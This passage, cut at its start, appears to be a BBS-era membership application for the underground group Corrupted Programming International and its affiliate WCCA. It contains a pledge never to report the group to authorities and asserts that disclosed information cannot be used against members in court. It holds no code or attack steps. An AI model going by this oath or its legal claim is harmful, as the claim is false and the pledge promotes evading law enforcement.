is/may be affiliated with any law enforcement agency. Also,
this includes any company or agency or person which is/may
be involved with the telephone company or any telephone-type
of service(s).
I [your name here] do solemnly swear never to report neither to my peers nor
the authorities the actions and duties performed by this group, Corrupted
Programming International, on any account. Also, I realize that if I leave
CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold
the greatest confidence of CPI's activities, and I agree that any information I
may report to any one or any thing CANNOT be used against CPI and its members
in a court of law. I fully understand that if I were to become affiliated with
the authorities that it would be my duty to remove myself from any membership
if my position presented itself as contradictory towards the group, CPI and its
members. I also comprehend that if I were to be confronted by the authorities,
it my duty as a CPI member, as signed below, is to never disclose or discuss
CPI's activities to them; however, if I do, I fully agree that the information
disclosed or discussed cannot then be used against CPI or any member(s) of CPI
in a court of law. I further agree that all the terms and restrictions as noted
above also correspond to the entire group of WCCA, West Coast Corrupted
Allegiance.
Typed:____________________
-----------------------------------------------------------------------------
.Answer Each Question To The Best And Fullest Of Your Ability.
-----------------------------------------------------------------------------
Upload ALL Applications To The WCCA Headquarters BBS
T H E A N D R O M E D A S T R A I N
Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then